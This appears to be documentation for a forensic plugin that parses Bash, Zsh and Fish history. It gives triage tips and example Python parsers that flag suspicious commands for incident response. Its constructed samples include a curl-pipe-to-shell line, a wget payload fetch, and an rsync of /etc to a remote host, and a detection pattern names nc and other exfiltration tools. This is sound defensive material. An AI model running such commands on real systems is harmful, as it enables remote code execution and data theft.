Shell History
Command-line history from Bash, Zsh, Fish, and other shells, revealing user activity and potential indicators of compromise.
- Status: available
- CLI plugin: shell.history
- Categories: shell, user
Overview
Shell history provides a detailed record of commands executed by users on the system. This artifact is invaluable for understanding user activity, identifying potential compromise indicators, and reconstructing timelines of system administration tasks.
Analysis Tips
- Look for suspicious patterns: commands involving `curl`, `wget`, `nc`, or encoded payloads may indicate malicious activity
- Check timestamps: Zsh extended format includes execution timestamps and duration
- Cross-reference users: compare history across multiple user accounts for lateral movement
- Identify privilege escalation: look for `sudo`, `su`, or permission-related commands
- Review data exfiltration: commands involving `scp`, `rsync`, or cloud storage tools
Timestamps
Different shells handle timestamps differently:
| Shell | Timestamp Format | Duration |
|-------|------------------|----------|
| Bash | Optional (`HISTTIMEFORMAT`) | No |
| Zsh | Extended format (`: <timestamp>:<duration>;<cmd>`) | Yes |
| Fish | YAML (`when:` field) | No |
| Sh | None | No |
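The parsers below, added here as an example and not part of the plugin's own code, read the three timestamped formats from the table above and apply the triage patterns from Analysis Tips (suspicious tokens, privilege escalation, exfiltration tools), merging several users' histories into one ordered timeline. The history samples, the `Entry` record and the `SUSPICIOUS` token list are constructed for the example.

```python
import re
from collections import namedtuple
# Constructed sample history files (not captured from any real system).
BASH_HISTORY = "#1700000000\nls -la\n#1700000060\ncurl http://example.invalid/x | sh\n"
ZSH_HISTORY = ": 1700000100:0;sudo su -\n: 1700000200:5;rsync -a /etc user@host:/tmp\n"
FISH_HISTORY = "- cmd: wget http://example.invalid/p\n  when: 1700000300\n  paths:\n    - /tmp/p\n"
# Tokens the Analysis Tips call out; a match is a triage hint, not a verdict.
SUSPICIOUS = re.compile(r"\b(curl|wget|nc|ncat|sudo|su|scp|rsync|base64)\b")
ZSH_EXTENDED = re.compile(r"^: (\d+):(\d+);(.*)$")  # ": <epoch>:<duration>;<cmd>"
# timestamp: epoch seconds or None (shell kept none); duration: seconds, zsh only.
Entry = namedtuple("Entry", "shell command timestamp duration", defaults=(None, None))

def parse_bash(text):
    # A "#<epoch>" line precedes each command only if HISTTIMEFORMAT was set.
    entries, stamp = [], None
    for line in text.splitlines():
        if line.startswith("#") and line[1:].isdigit():
            stamp = int(line[1:])
        elif line:
            entries.append(Entry("bash", line, stamp))
            stamp = None
    return entries

def parse_zsh(text):
    # Extended lines carry timestamp and duration; plain lines carry neither.
    entries = []
    for line in text.splitlines():
        if m := ZSH_EXTENDED.match(line):
            entries.append(Entry("zsh", m[3], int(m[1]), int(m[2])))
        elif line:
            entries.append(Entry("zsh", line))
    return entries

def parse_fish(text):
    # YAML-like records: "- cmd:" followed by an indented "when:" field.
    entries = []
    for line in text.splitlines():
        if line.startswith("- cmd: "):
            entries.append(Entry("fish", line[7:]))
        elif line.startswith("  when: ") and entries:
            entries[-1] = entries[-1]._replace(timestamp=int(line[8:]))
    return entries

def flag_suspicious(*histories):
    # Merge histories (several shells or users) into a timeline of commands that
    # match SUSPICIOUS, paired with the tokens hit; undated entries sort last.
    hits = [(e, tuple(sorted(set(SUSPICIOUS.findall(e.command)))))
            for h in histories for e in h]
    return sorted((p for p in hits if p[1]),
                  key=lambda p: (p[0].timestamp is None, p[0].timestamp or 0))
```

Bash entries written without `HISTTIMEFORMAT` and plain Zsh lines come back with `timestamp=None`, so the timeline can only order them relative to each other by file position, not by time.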
Related Artifacts
- Safari Browser - Web browsing correlates with download commands
- FSEvents - File system activity correlates with file operations
References
Data sources
- ~/
  Bash command history with optional timestamps
- ~/
  Zsh command history with timestamps and duration
- ~/.local/share/fish/
  Fish shell history with timestamps and paths
- ~/
  POSIX shell command history